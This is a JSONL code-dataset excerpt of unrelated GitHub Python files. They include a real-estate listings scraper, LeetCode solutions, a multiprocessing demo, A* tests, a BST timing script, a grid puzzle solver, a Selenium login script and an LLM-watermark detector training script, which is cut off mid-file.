'%20and%20OriginatingSystemName%20eq%20%27REColorado%27%20and%20StandardStatus%20eq%20%27Closed%27&$select=OffMarketTimestamp,' + query\n\n url_pikes = 'https://listings.constellation1apis.com/OData/Property?$top=' + top + '&$ignorenulls=true&$filter=OnMarketTimestamp%20gt%20' + z + '%20and%20OnMarketTimestamp%20le%20' + zg + '%20and%20OriginatingSystemName%20eq%20%27PikesPeak%27%20and%20StandardStatus%20eq%20%27Active%27&$select=' + query\n\n url2_pikes = 'https://listings.constellation1apis.com/OData/Property?$top=' + top + '&$ignorenulls=true&$filter=OnMarketTimestamp%20gt%20' + z + '%20and%20OnMarketTimestamp%20le%20' + zg + '%20and%20OriginatingSystemName%20eq%20%27PikesPeak%27%20and%20StandardStatus%20eq%20%27Closed%27&$select=OffMarketTimestamp,' + query\n\n \n\n response = req.get(url, headers=hz, timeout=60, stream=True).json() # Get Active Properties\n\n response2 = req.get(url2, headers=hz, timeout=60, stream=True).json() # Get Closed Properties\n\n response_pikes = req.get(url_pikes, headers=hz, timeout=60, stream=True).json() # Get Active Properties\n\n response2_pikes = req.get(url2_pikes, headers=hz, timeout=60, stream=True).json() # Get Closed Properties\n\n # Logic Code Ends Here\n\n # Declaration Of Variables Starts Here\n open_response_colorado = response['value']\n #l_id = 'NULL'\n l_status = 'NULL'\n l_postal_code = 'NULL'\n l_realtor_name = 'NULL'\n l_listing_price = 'NULL'\n l_listing_date = 'NULL'\n\n closed_response_colorado = response2['value']\n #l2_id = 'NULL'\n l2_status = 'NULL'\n l2_postal_code = 'NULL'\n l2_realtor_name = 'NULL'\n l2_listing_price = 'NULL'\n l2_listing_date = 'NULL'\n l2_closing_date = 'NULL'\n\n open_response_pikes = response_pikes['value']\n #p_id = 'NULL'\n p_status = 'NULL'\n p_postal_code = 'NULL'\n p_realtor_name = 'NULL'\n p_listing_price = 'NULL'\n p_listing_date = 'NULL'\n\n closed_response_pikes = response2_pikes['value']\n #p2_id = 'NULL'\n p2_status = 'NULL'\n p2_postal_code = 'NULL'\n p2_realtor_name = 'NULL'\n p2_listing_price = 'NULL'\n p2_listing_date = 'NULL'\n p2_closing_date = 'NULL'\n\n # total_open_properties = int(response['@odata.totalCount']) + int(response_pikes['@odata.totalCount'])\n # total_closed_properties = int(response2['@odata.totalCount']) + int(response2_pikes['@odata.totalCount'])\n\n # Declaration Of Variables Ends Here\n with conn.cursor() as cur:\n # cur.execute(\"create table results (date_inserted varchar(255) NOT NULL, time_period varchar(255), average_price varchar(255), median_price varchar(255), total_units_sold varchar(255), postal_code_1 varchar(255), postal_code_2 varchar(255), postal_code_3 varchar(255), postal_code_4 varchar(255), postal_code_5 varchar(255), realtor_1 varchar(255), realtor_2 varchar(255), realtor_3 varchar(255), realtor_4 varchar(255), realtor_5 varchar(255), PRIMARY KEY (date_inserted))\")\n # cur.execute(\"create table raw_data_open_properties (ListingId varchar(255) not NULL, status varchar(255), postal_code varchar(255), realtor_name varchar(255), listing_price varchar(255), total_open_properties varchar(255), Listing_Date varchar(255), PRIMARY KEY (ListingId))\")\n # cur.execute(\"create table raw_data_closed_properties (ListingId varchar(255) not NULL, status varchar(255), postal_code varchar(255), realtor_name varchar(255), listing_price varchar(255), total_closed_properties varchar(255), Listing_Date varchar(255), Selling_Date varchar(255), PRIMARY KEY (ListingId))\")\n ins = 'insert ignore into results (date_inserted, time_period, average_price, median_price, total_units_sold, postal_code_1, postal_code_2, postal_code_3, postal_code_4, postal_code_5, realtor_1, realtor_2, realtor_3, realtor_4, realtor_5) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'\n ins_open = 'insert ignore into raw_data_open_properties (ListingId, status, postal_code, realtor_name, listing_price, total_open_properties, Listing_Date) values(%s,%s,%s,%s,%s,%s,%s)'\n ins_closed = 'insert ignore into raw_data_closed_properties (ListingId, status, postal_code, realtor_name, listing_price, total_closed_properties, Listing_Date, Selling_Date) values(%s,%s,%s,%s,%s,%s,%s,%s)'\n\n # cur.execute(\"DELETE FROM raw_data_open_properties\")\n # cur.execute(\"DELETE FROM raw_data_closed_properties\")\n\n for i in range(len(open_response_colorado)):\n try:\n # for open properties in ReColorado\n l_id = open_response_colorado[i]['ListingId']\n if 'StandardStatus' in open_response_colorado[i]:\n l_status = open_response_colorado[i]['StandardStatus']\n if 'PostalCode' in open_response_colorado[i]: \n l_postal_code = open_response_colorado[i]['PostalCode']\n postal=open_response_colorado[i]['PostalCode']\n if postal not in postal_codes:\n postal_codes[postal] = 1\n elif postal in postal_codes:\n postal_codes[postal] += 1\n if 'ListAgentFullName' in open_response_colorado[i]: \n l_realtor_name = open_response_colorado[i]['ListAgentFullName']\n agent=open_response_colorado[i]['ListAgentFullName']\n if agent not in dictionary:\n dictionary[agent] = 1\n elif agent in dictionary:\n dictionary[agent] += 1\n if 'ListPrice' in open_response_colorado[i]:\n l_listing_price = open_response_colorado[i]['ListPrice']\n prices.append(int(open_response_colorado[i]['ListPrice']))\n if 'OnMarketTimestamp' in open_response_colorado[i]:\n l_listing_date = open_response_colorado[i]['OnMarketTimestamp']\n cur.execute(ins_open, ((str(l_id)), str(l_status), str(l_postal_code), str(l_realtor_name),str(l_listing_price), str(total_units_open_), str(l_listing_date)))\n l_id = 'NULL'\n l_status = 'NULL'\n l_postal_code = 'NULL'\n l_realtor_name = 'NULL'\n l_listing_price = 'NULL'\n l_listing_date = 'NULL'\n\n except KeyError:\n print('key error when Entering')\n continue\n for i in range(len(open_response_pikes)):\n try:\n # for open properties in PikesPeak\n p_id = open_response_pikes[i]['ListingId']\n if 'StandardStatus' in open_response_pikes[i]:\n p_status = open_response_pikes[i]['StandardStatus']\n if 'PostalCode' in open_response_pikes[i]:\n p_postal_code = open_response_pikes[i]['PostalCode']\n postal=open_response_pikes[i]['PostalCode']\n if postal not in postal_codes:\n postal_codes[postal] = 1\n elif postal in postal_codes:\n postal_codes[postal] += 1\n if 'ListAgentFullName' in open_response_pikes[i]:\n p_realtor_name = open_response_pikes[i]['ListAgentFullName']\n agent=open_response_pikes[i]['ListAgentFullName']\n if agent not in dictionary:\n dictionary[agent] = 1\n elif agent in dictionary:\n dictionary[agent] += 1\n if 'ListPrice' in open_response_pikes[i]:\n p_listing_price = open_response_pikes[i]['ListPrice']\n prices.append(int(open_response_pikes[i]['ListPrice']))\n if 'OnMarketTimestamp' in open_response_pikes[i]:\n p_listing_date = open_response_pikes[i]['OnMarketTimestamp']\n cur.execute(ins_open, ((str(p_id)), str(p_status), str(p_postal_code), str(p_realtor_name),str(p_listing_price), str(total_units_open_), str(p_listing_date)))\n p_status = 'NULL'\n p_postal_code = 'NULL'\n p_realtor_name = 'NULL'\n p_listing_price = 'NULL'\n p_listing_date = 'NULL'\n \n\n except KeyError:\n print('key error when Etering')\n continue\n for i in range(len(closed_response_pikes)):\n try:\n # for closed properties in PikesPeak\n p2_id = closed_response_pikes[i]['ListingId']\n if 'StandardStatus' in closed_response_pikes[i]:\n p2_status = closed_response_pikes[i]['StandardStatus']\n if 'PostalCode' in closed_response_pikes[i]:\n p2_postal_code = closed_response_pikes[i]['PostalCode']\n postal=closed_response_pikes[i]['PostalCode']\n if postal not in postal_codes:\n postal_codes[postal] = 1\n elif postal in postal_codes:\n postal_codes[postal] += 1\n if 'ListAgentFullName' in closed_response_pikes[i]:\n p2_realtor_name = closed_response_pikes[i]['ListAgentFullName']\n agent=closed_response_pikes[i]['ListAgentFullName']\n if agent not in dictionary:\n dictionary[agent] = 1\n elif agent in dictionary:\n dictionary[agent] += 1\n if 'ListPrice' in closed_response_pikes[i]:\n p2_listing_price = closed_response_pikes[i]['ListPrice']\n prices.append(int(closed_response_pikes[i]['ListPrice']))\n if 'OnMarketTimestamp' in closed_response_pikes[i]:\n p2_listing_date = closed_response_pikes[i]['OnMarketTimestamp']\n if 'OffMarketTimestamp' in closed_response_pikes[i]:\n p2_closing_date = closed_response_pikes[i]['OffMarketTimestamp']\n cur.execute(ins_closed, ((str(p2_id)), str(p2_status), str(p2_postal_code), str(p2_realtor_name),str(p2_listing_price), str(total_units_sold_), str(p2_listing_date),str(p2_closing_date)))\n p2_status = 'NULL'\n p2_postal_code = 'NULL'\n p2_realtor_name = 'NULL'\n p2_listing_price = 'NULL'\n p2_listing_date = 'NULL'\n p2_closing_date = 'NULL'\n except KeyError:\n print('key error when Entering')\n continue\n for i in range(len(closed_response_colorado)):\n try:\n # for closed properties in ReColorado\n l2_id = closed_response_colorado[i]['ListingId']\n if 'StandardStatus' in closed_response_colorado[i]:\n l2_status = closed_response_colorado[i]['StandardStatus']\n if 'PostalCode' in closed_response_colorado[i]:\n l2_postal_code = closed_response_colorado[i]['PostalCode']\n postal=closed_response_colorado[i]['PostalCode']\n if postal not in postal_codes:\n postal_codes[postal] = 1\n elif postal in postal_codes:\n postal_codes[postal] += 1\n if 'ListAgentFullName' in closed_response_colorado[i]:\n l2_realtor_name = closed_response_colorado[i]['ListAgentFullName']\n agent=closed_response_colorado[i]['ListAgentFullName']\n if agent not in dictionary:\n dictionary[agent] = 1\n elif agent in dictionary:\n dictionary[agent] += 1\n if 'ListPrice' in closed_response_colorado[i]:\n l2_listing_price = closed_response_colorado[i]['ListPrice']\n prices.append(int(closed_response_colorado[i]['ListPrice']))\n if 'OnMarketTimestamp' in closed_response_colorado[i]:\n l2_listing_date = closed_response_colorado[i]['OnMarketTimestamp']\n if 'OffMarketTimestamp' in closed_response_colorado[i]:\n l2_closing_date = closed_response_colorado[i]['OffMarketTimestamp']\n cur.execute(ins_closed, ((str(l2_id)), str(l2_status), str(l2_postal_code), str(l2_realtor_name), str(l2_listing_price), str(total_units_sold_), str(l2_listing_date), str(l2_closing_date)))\n \n l2_status = 'NULL'\n l2_postal_code = 'NULL'\n l2_realtor_name = 'NULL'\n l2_listing_price = 'NULL'\n l2_listing_date = 'NULL'\n l2_closing_date = 'NULL'\n \n\n print('Value Validated')\n except KeyError:\n print('key error When Entering')\n continue\n # ListingId, status, postal_code, realtor_name, listing_price, total_open_properties\n\n conn.commit()\n\n\n \n average = sum(prices)/len(prices)\n postal_5 = heapq.nlargest(5, postal_codes, key=postal_codes.get)\n realtors_5 = heapq.nlargest(5, dictionary, key=dictionary.get)\n median = statistics.median(prices)\n units_sold = total_units_sold_\n # average, median, realtors, total_units_sold, postal, today\n with conn.cursor() as cur:\n cur.execute(ins, (str(t), str(average), str(time_period), str(median), str(units_sold), str(postal_5[0]), str(postal_5[1]), str(postal_5[2]), str(postal_5[3]), str(postal_5[4]), str(realtors_5[0]), str(realtors_5[1]), str(realtors_5[2]), str(realtors_5[3]), str(realtors_5[4])))\n conn.commit()\n # print(str(response['data']['report'][len(response['data']['report'])-1]))\n\n return 'complete'","repo_name":"AbuBakkar2022skipq/7LendingAWS","sub_path":"Main/resources/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":19281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26089081769","text":"#DP O(n^2)\nclass Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n if not nums:\n return 0\n table = [1 for i in range(len(nums))]\n \n max_length = 0\n for idx in range(len(table)):\n value = nums[idx]\n for nums_idx in range(0, idx):\n if nums[nums_idx] < value:\n table[idx] = max(table[idx], table[nums_idx] + 1)\n max_length = max(max_length, table[idx])\n return max_length\n\n#DP O(nlogm), n is the lengh of nums, m is the length of LIS\nclass Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n stack = []\n import bisect\n for num in nums:\n insert_point = bisect.bisect_left(stack, num)\n if insert_point < len(stack):\n stack.pop(insert_point)\n stack.insert(insert_point, num)\n return len(stack)","repo_name":"finderkiller/LeetCode","sub_path":"300LongestIncreasingSubsequence.py","file_name":"300LongestIncreasingSubsequence.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12245228177","text":"import os\nfrom multiprocessing import Process, cpu_count\nimport signal\nimport time\n\n\"\"\"\nA simple way to create a process and run it by passing arguments to it\n\"\"\"\n\n\ndef child_process(name):\n \"\"\"\n A function that is called by the process when it is launched\n \"\"\"\n for i in range(5):\n time.sleep(1)\n print(\"{} with pid {} ---- {}\".format(name, os.getpid(), i))\n\n\nif __name__ == \"__main__\":\n \n processes = [\n Process(target=child_process, args=[\"Kid #{}\".format(i)])\n for i in range(cpu_count())\n ]\n\n for p in processes:\n p.start()\n\n for i in range(3):\n time.sleep(1)\n print(\"Parent process {} says hello\".format(os.getpid()))\n\n \n for p in processes:\n p.terminate()\n # Does the same as:\n # os.kill(p.pid, signal.SIGTERM)\n\n # In case we\n # for p in processes:\n # p.join()\n\n print(\"End of father\")\n\n exit(0)\n","repo_name":"hlyes/python_multiprocess_examples","sub_path":"pres_1/multi_processing/multi_processing.py","file_name":"multi_processing.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10484168502","text":"import unittest\nfrom AStar import AStar\nfrom Map import Map\nfrom Unit import CreateUnitInstances\nfrom Field import Field\nimport pickle\nimport random\nfrom mock import Mock\n\nmock_server_resp = ' 0.1985018253326440greengreengreengreenbasegreengreen'\n\nclass AStarTests(unittest.TestCase):\n\n def setUp(self):\n fileObj = open('map.dat','r')\n self._map = pickle.load(fileObj)\n fileObj.close()\n self.aStarInstance = AStar(self._map, (1,0,'E'),(5,4,'E'))\n\n def test_dict_key_returns_good_key(self):\n dkey = self.aStarInstance.DictKey((1,2,'E'))\n self.assertEqual(dkey,'1,2,E')\n\n def test_astar_starts_good_in_basic_mode(self):\n a = self.aStarInstance\n self.assertEqual(a.Start(),{'status':'OK','direction': 'SE', 'cost': 6})\n\n def test_heurisic_cost_calculated(self):\n a = self.aStarInstance\n x = (1,1,'E')\n y = (4,5,'E')\n self.assertEqual(a.HeuristicCost(x,y),25)\n\n def test_passage_cost_on_different_field_types(self):\n a = self.aStarInstance\n xBorder = self._map.xBorder\n yBorder = self._map.yBorder\n xRange = range(0,xBorder)\n yRange = range(0,yBorder)\n for y in yRange:\n for x in xRange:\n try:\n if not self._map[y][x].movable:\n continue\n except:\n continue\n neighbours = self._map.GetNeighbours((x,y,'E'),False)\n for nei in neighbours:\n self.assertIn(a.PassageCost(nei['field']),\n [a.normalCost,a.redCost,a.unknownCost])\n\nclass MapTests(unittest.TestCase):\n def setUp(self):\n fileObj = open('map.dat','r')\n self._map = pickle.load(fileObj)\n fileObj.close()\n def test_transferable(self):\n self.assertTrue(self._map.Transferable((1,1),(1,1)))\n self.assertTrue(not self._map.Transferable((5,3),(0,1)))\n def test_getneighbours_returns_neighbours_list(self):\n x = 1\n y = 2\n phi = 'E'\n neighbours = self._map.GetNeighbours((x,y,phi),hold=False)\n self.assertEqual(len(neighbours),7)\n for n in neighbours:\n self.assertEqual(len(n['coords']),3)\n self.assertTrue(isinstance(n['field'],\n self._map._map[y][x].__class__))\n self.assertTrue(n['direction'] in\n ['E','SE','SW','W','NW','NE','Right','Left'])\n x = 1\n y = 2\n phi = 'SW'\n neighbours = self._map.GetNeighbours((x,y,phi),hold=True)\n self.assertEqual(len(neighbours),6)\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pptaszni/CA","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23891448606","text":"\"\"\"\n-------------------------------------------------------\n[program description]\n-------------------------------------------------------\nAuthor: Ryan Doucet\nID: 181954640\nEmail: douc4640@mylaurier.ca\n__updated__ = \"2019-03-21\"\n-------------------------------------------------------\n\"\"\"\n# Imports\nfrom BST_linked import BST\nfrom Letter import Letter\nfrom functions import do_comparisons, comparison_total\nimport time\n# Constants\nSEP = '------------------------------------------------------------'\ndef func():\n \"\"\"\n -------------------------------------------------------\n description\n Use:\n -------------------------------------------------------\n Parameters:\n name - description (type)\n Returns:\n name - description (type)\n ------------------------------------------------------\n\n \"\"\"\n\nstart = time.time()\nbst1 = BST()\nbst2 = BST()\nbst3 = BST()\n\nDATA1 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\nDATA2 = \"MFTCJPWADHKNRUYBEIGLOQSVXZ\"\nDATA3 = \"ETAOINSHRDLUCMPFYWGBVKJXZQ\"\n\nfor i in DATA1:\n val = Letter(i)\n bst1.insert(val)\nfor i in DATA2:\n val = Letter(i)\n bst2.insert(val)\nfor i in DATA3:\n val = Letter(i)\n bst3.insert(val)\n\ntest_file = open('otoos610.txt','r',encoding = 'utf-8')\ntest_file = test_file.read()\n\ndo_comparisons(test_file, bst1)\ntotal1 = comparison_total(bst1)\n\ndo_comparisons(test_file, bst2)\ntotal2 = comparison_total(bst2)\n\ndo_comparisons(test_file, bst3)\ntotal3 = comparison_total(bst3)\n\n\n\nprint('Comparing by order: {}'.format(DATA1))\nprint('Total comparisons: {:,}'.format(total1))\nprint(SEP)\nprint('Comparing by order: {}'.format(DATA2))\nprint('Total comparisons: {:,}'.format(total2))\nprint(SEP)\nprint('Comparing by order: {}'.format(DATA3))\nprint('Total comparisons: {:,}'.format(total3))\nprint(SEP)\nprint()\nend = time.time()\ntime_total = end-start\nprint('Took {:.2f}s to execute'.format(time_total))\n","repo_name":"Ryanadoucet/BST_Test","sub_path":"t02.py","file_name":"t02.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31763870940","text":"# 양치기 꿍\n\"\"\"\nR = 세로의 길이, C = 가로의 길이\n. = 빈공간 , # = 울타리, v = 늑대, k = 양\n\"\"\"\nimport sys\nsys.setrecursionlimit(10**6)\n\nR,C = map(int,input().split())\nland = []\nfor r in range(R):\n land.append(list(input()))\n\nmove = [[-1,0],[1,0],[0,-1],[0,1]]\n\ndef dfs(x,y):\n global k,v # 전역변수 선언\n if land[x][y] == 'k':\n k += 1\n elif land[x][y] == 'v':\n v += 1\n if land[x][y] != '#':\n land[x][y] = '#'\n for i in range(4):\n dx = x + move[i][0]\n dy = y + move[i][1]\n if dx < 0 or dx >= R or dy < 0 or dy >= C:\n continue\n if land[dx][dy] != '#':\n dfs(dx, dy)\n\nlamb ,wolf = 0, 0\nfor r in range(R):\n for c in range(C):\n k, v = 0, 0\n dfs(r, c)\n if k > v:\n lamb += k\n else:\n wolf += v\n\nprint(lamb,wolf)","repo_name":"yerimstar/BOJ","sub_path":"Python/etc/3187.py","file_name":"3187.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6321156847","text":"import time\nfrom selenium import webdriver\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options \nimport pyperclip\nimport subprocess\nfrom datetime import datetime\n\nchrome_options = Options()\nchrome_options.add_argument('--headless') # Run Chrome in headless mode\nchrome_options.add_argument('--disable-gpu') # Disable GPU acceleration\n\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()),options=chrome_options)\n\ndef display_notification(message):\n # Escape the double quotes in the message for the AppleScript string\n escaped_message = message.replace('\"', '\\\\\"')\n applescript = f'display notification \"{escaped_message}\"'\n subprocess.run(['osascript', '-e', applescript], capture_output=True)\n time.sleep(10)\n\ndef test_google_search():\n try:\n # Open the website\n driver.get('https://ajey.vercel.app')\n\n username = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > input:nth-child(2)')\n username.send_keys('rnd')\n password = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > input:nth-child(3)')\n password.send_keys('1.1.1')\n \n getInButton = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div.css-175oi2r.r-1i6wzkk.r-lrvibr.r-1loqt21.r-1otgn73')\n getInButton.click()\n\n time.sleep(5)\n search = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div:nth-child(2) > div:nth-child(3) > div:nth-child(1) > div.css-175oi2r.r-1i6wzkk.r-lrvibr.r-1loqt21.r-1otgn73 > div.css-1rynq56')\n search.click()\n\n searchBox = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div:nth-child(2) > div:nth-child(2) > textarea')\n searchCLI = input('Search For : ')\n print('\\n Searching..', searchCLI)\n searchBox.send_keys(searchCLI)\n # selectBook = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div:nth-child(1) > div:nth-child(6) > div > div')\n # selectBook.click()\n\n con = driver.find_element(By.CSS_SELECTOR,'#root > div > div > div > div > div.css-175oi2r.r-13awgt0 > div > div.css-175oi2r.r-1p0dtai.r-1d2f490.r-u8s1d.r-zchlnj.r-ipm5af.r-12vffkv > div:nth-child(2) > div > div > div > div.css-175oi2r.r-13awgt0 > div > div > div:nth-child(2) > div:nth-child(2) > div:nth-child(5) > div > div:nth-child(1) > div.css-175oi2r.r-1i6wzkk.r-lrvibr.r-1loqt21.r-1otgn73 > div > div:nth-child(2) > div > textarea')\n # driver.save_screenshot(\"screenshot.png\")\n showThis = con.text\n print('>>> ',showThis)\n pyperclip.copy(showThis)\n display_notification(\"Item copied: \" + showThis)\n\n time.sleep(10)\n # Verify the expected content or title on the page to confirm success\n print('Test passed!')\n time.sleep(50)\n\n except AssertionError as e:\n print('Test failed:', str(e))\n finally:\n # Close the browser\n driver.quit()\n\ndef create_reminder(title, notes, due_date):\n command = [\n '/System/Applications/reminders', # Replace with the actual path to the reminders command\n 'add',\n '--title', title,\n '--notes', notes,\n '--due', due_date\n ]\n subprocess.run(command)\n\nreminder_title = \"A Project\"\nreminder_notes = \"Complete the final report and submit it.\"\nreminder_due_date = \"2023-08-10 09:14:50\" # Corrected ISO 8601 date and time format\n\n\n\nif __name__ == \"__main__\":\n test_google_search()\n # create_reminder(reminder_title, reminder_notes, reminder_due_date)\n","repo_name":"ajayoncode/pythonScripts","sub_path":"Dummy/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18833786072","text":"import torch.nn as nn\nimport torch\nfrom util.bit_util import int_to_bin_list\nfrom torch.utils.data import Dataset, DataLoader\nimport os\nimport json\nimport torch.nn.functional as F\nfrom model_key import SubNet\nfrom transformers import GPT2Tokenizer, AutoTokenizer, LlamaTokenizer\nimport torch.nn as nn\nimport json\n\nclass TransformerClassifier(nn.Module):\n def __init__(self, bit_number, b_layers, input_dim, hidden_dim, num_classes=1, num_layers=2):\n super(TransformerClassifier, self).__init__()\n self.binary_classifier = SubNet(bit_number, b_layers)\n self.classifier = nn.LSTM(input_dim, hidden_dim, num_layers, batch_first=True)\n self.fc_hidden = nn.Linear(hidden_dim, hidden_dim)\n self.fc = nn.Linear(hidden_dim, num_classes)\n self.sigmoid = nn.Sigmoid()\n self.dropout = nn.Dropout(0.1)\n\n def forward(self, x):\n batch_size, seq_len, _ = x.size()\n x1 = x.view(batch_size*seq_len, -1)\n features = self.binary_classifier(x1)\n features = features.view(batch_size, seq_len, -1) # Ensure LSTM compatible shape\n output, _ = self.classifier(features)\n output = self.fc_hidden(output[:, -1, :]) # Take the last LSTM output for classification\n output = self.dropout(output)\n output = self.sigmoid(output)\n output = self.fc(output) \n output = self.dropout(output)\n output = self.sigmoid(output)\n return output\n\nclass Seq2SeqDataset(Dataset):\n def __init__(self, data):\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n return self.data[idx]\n\ndef prepare_data(filepath, train_or_test=\"train\", llm_name=\"gpt2\", bit=16, z_value=4):\n data = []\n if train_or_test == \"train\":\n with open(filepath, 'r') as f:\n for line in f:\n json_obj = json.loads(line)\n inputs = json_obj['Input']\n output = json_obj['Output']\n label = 1 if output > z_value else 0 # binary classification\n \n inputs_bin = [int_to_bin_list(n, bit) for n in inputs]\n \n data.append((torch.tensor(inputs_bin), torch.tensor(label))) # label is a scalar\n else:\n with open(filepath, 'r') as f:\n for line in f:\n json_obj = json.loads(line)\n inputs = json_obj['Input']\n label = json_obj['Tag']\n z_score = json_obj['Z-score']\n \n if llm_name == \"gpt2\":\n tokenizer = GPT2Tokenizer.from_pretrained(\"gpt2\")\n inputs = tokenizer(inputs, return_tensors=\"pt\", add_special_tokens=True)\n elif llm_name == \"opt-1.3b\":\n tokenizer = AutoTokenizer.from_pretrained(\"facebook/opt-1.3b\", use_fast=False)\n inputs = tokenizer(inputs, return_tensors=\"pt\", add_special_tokens=True)\n elif llm_name == \"llama-7b\":\n tokenizer = LlamaTokenizer.from_pretrained(\"decapoda-research/llama-7b-hf\")\n inputs = tokenizer(inputs, return_tensors=\"pt\", add_special_tokens=True)\n \n inputs_bin = [int_to_bin_list(n, bit) for n in inputs[\"input_ids\"].squeeze()]\n \n data.append((torch.tensor(inputs_bin), torch.tensor(label), torch.tensor(z_score))) # label is a scalar\n \n return data\n\n\ndef pad_sequence_to_fixed_length(inputs, target_length, padding_value=0):\n padded_inputs = torch.nn.utils.rnn.pad_sequence(inputs, batch_first=True, padding_value=padding_value)\n \n original_length = padded_inputs.shape[1]\n\n if original_length < target_length:\n # If the original sequence is shorter than the target length, we need to further pad the sequences\n pad_size = (0, 0, 0, target_length - original_length)\n padded_inputs = F.pad(padded_inputs, pad_size, value=padding_value)\n elif original_length > target_length:\n # If the original sequence is longer than the target length, we need to truncate the sequences\n padded_inputs = padded_inputs[:, :target_length, :]\n else:\n # If the original sequence is the same as the target length, just return the original inputs\n padded_inputs = padded_inputs\n\n return padded_inputs\n\ndef train_collate_fn(batch):\n inputs = [item[0] for item in batch]\n targets = [item[1] for item in batch]\n \n inputs_padded = pad_sequence_to_fixed_length(inputs, 200)\n \n return inputs_padded, torch.stack(targets)\n\ndef test_collate_fn(batch):\n inputs = [item[0] for item in batch]\n targets = [item[1] for item in batch]\n z_score = [item[2] for item in batch]\n \n inputs_padded = pad_sequence_to_fixed_length(inputs, 200)\n \n return inputs_padded, torch.stack(targets), torch.stack(z_score)\n\ndef train_model(_bit_number, _input_dir, model_file, output_model_dir, b_layers, z_value, llm_name):\n # Prepare data\n train_data = prepare_data(os.path.join(_input_dir, 'train_data.jsonl'), train_or_test=\"train\", bit=_bit_number, z_value=z_value, llm_name=llm_name)\n test_data = prepare_data(os.path.join(_input_dir, 'test_data.jsonl'), train_or_test=\"test\", bit=_bit_number, z_value=z_value, llm_name=llm_name)\n\n train_dataset = Seq2SeqDataset(train_data)\n test_dataset = Seq2SeqDataset(test_data)\n\n train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True, collate_fn=train_collate_fn)\n test_dataloader = DataLoader(test_dataset, batch_size=32, collate_fn=test_collate_fn)\n\n # Initialize model and optimizer\n pretrained_dict = torch.load(model_file)\n model = TransformerClassifier(_bit_number, b_layers, 64, 128)\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n model = model.to(device)\n model_dict = model.binary_classifier.state_dict()\n pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n model.binary_classifier.load_state_dict(model_dict, strict=True)\n\n optimizer = torch.optim.Adam(model.parameters(), lr=0.0005)\n\n # Define the loss function\n loss_fn = torch.nn.BCELoss()\n\n for param in model.binary_classifier.parameters():\n param.requires_grad = False\n\n print(\"private detector:\")\n # save the average acc, tpr, fpr, tnr, fnr of the last 5 epochs\n acc_avg, tpr_avg, fpr_avg, tnr_avg, fnr_avg, f1_avg = 0, 0, 0, 0, 0, 0\n # Train and evaluate\n epochs = 80\n for epoch in range(epochs):\n model.train()\n train_losses = []\n correct = 0\n total = 0\n for inputs, targets in train_dataloader:\n targets = targets.cuda()\n optimizer.zero_grad()\n outputs = model((inputs.float()).cuda())\n outputs = outputs.reshape([-1])\n loss = loss_fn(outputs, (targets.float()))\n loss.backward()\n optimizer.step()\n train_losses.append(loss.item())\n\n # calculate accuracy\n predicted = (outputs.data > 